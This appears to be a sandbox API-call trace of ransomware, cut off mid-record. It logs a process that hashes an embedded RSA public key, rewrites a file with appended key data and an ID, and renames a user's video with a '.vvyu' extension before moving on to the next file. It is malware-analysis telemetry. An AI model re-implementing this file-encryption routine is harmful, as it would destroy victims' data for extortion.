0x0 [0202.569] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x129d8, lpOverlapped=0x0) returned 1 [0202.571] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0202.571] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.571] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.571] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0202.572] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0202.572] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0202.572] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0202.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0202.572] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0202.572] GetLastError () returned 0x0 [0202.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.572] GetLastError () returned 0x0 [0202.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.573] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0202.573] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0202.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.573] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0202.573] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0202.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.573] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0202.574] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x129e0) returned 0x2ea99b0 [0202.574] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0202.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0202.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0202.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0202.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1ba0 [0202.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3638 [0202.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1be8 [0202.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3650 [0202.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3680 [0202.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36e0 [0202.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3698 [0202.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0202.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0202.575] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0202.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0202.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3680 | out: hHeap=0x620000) returned 1 [0202.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3698 | out: hHeap=0x620000) returned 1 [0202.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36e0 | out: hHeap=0x620000) returned 1 [0202.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0202.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36e0 [0202.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0202.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3698 [0202.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0202.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3680 [0202.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0202.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0202.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0202.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0202.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0202.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0202.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0202.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0202.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3698 | out: hHeap=0x620000) returned 1 [0202.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3680 | out: hHeap=0x620000) returned 1 [0202.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36e0 | out: hHeap=0x620000) returned 1 [0202.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0202.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0202.578] GetCurrentThreadId () returned 0x66c [0202.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0202.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea9438 [0202.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0202.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0202.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0202.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0202.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.579] GetCurrentThreadId () returned 0x66c [0202.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0202.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0202.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0202.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0202.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0202.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0202.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36e0 [0202.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0202.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0202.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0202.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0202.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3680 [0202.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0202.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0202.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0202.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0202.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3698 [0202.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0202.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0202.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0202.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3668 [0202.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0202.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36f8 [0202.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0202.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36c8 [0202.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0202.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36b0 [0202.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3710 [0202.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36b0 | out: hHeap=0x620000) returned 1 [0202.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea36b0 [0202.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36c8 | out: hHeap=0x620000) returned 1 [0202.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0202.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0202.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0202.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3680 | out: hHeap=0x620000) returned 1 [0202.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3680 [0202.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0202.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36e0 | out: hHeap=0x620000) returned 1 [0202.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0202.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3710 | out: hHeap=0x620000) returned 1 [0202.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0202.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0202.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0202.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3680 | out: hHeap=0x620000) returned 1 [0202.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0202.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0202.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0202.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0202.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0202.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0202.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0202.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0202.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0202.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36b0 | out: hHeap=0x620000) returned 1 [0202.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36f8 | out: hHeap=0x620000) returned 1 [0202.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3698 | out: hHeap=0x620000) returned 1 [0202.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3668 | out: hHeap=0x620000) returned 1 [0202.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0202.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0202.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0202.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3650 | out: hHeap=0x620000) returned 1 [0202.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1be8 | out: hHeap=0x620000) returned 1 [0202.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0202.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0202.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0202.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0202.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0202.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0202.591] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x129d3, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x129d3, lpOverlapped=0x0) returned 1 [0202.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0202.592] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x129d8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.592] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0202.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0202.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0202.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0202.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0202.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.594] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0202.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0202.594] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0202.594] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0202.594] CloseHandle (hObject=0x510) returned 1 [0202.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0202.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0202.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0202.596] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\s_e2a5ScpFSgR9-.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\s_e2a5scpfsgr9-.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\s_e2a5ScpFSgR9-.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\s_e2a5scpfsgr9-.mkv.vvyu")) returned 1 [0202.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.598] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0202.601] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ecec30, ftCreationTime.dwHighDateTime=0x1d8a408, ftLastAccessTime.dwLowDateTime=0xc708cc60, ftLastAccessTime.dwHighDateTime=0x1d8a493, ftLastWriteTime.dwLowDateTime=0xc708cc60, ftLastWriteTime.dwHighDateTime=0x1d8a493, nFileSizeHigh=0x0, 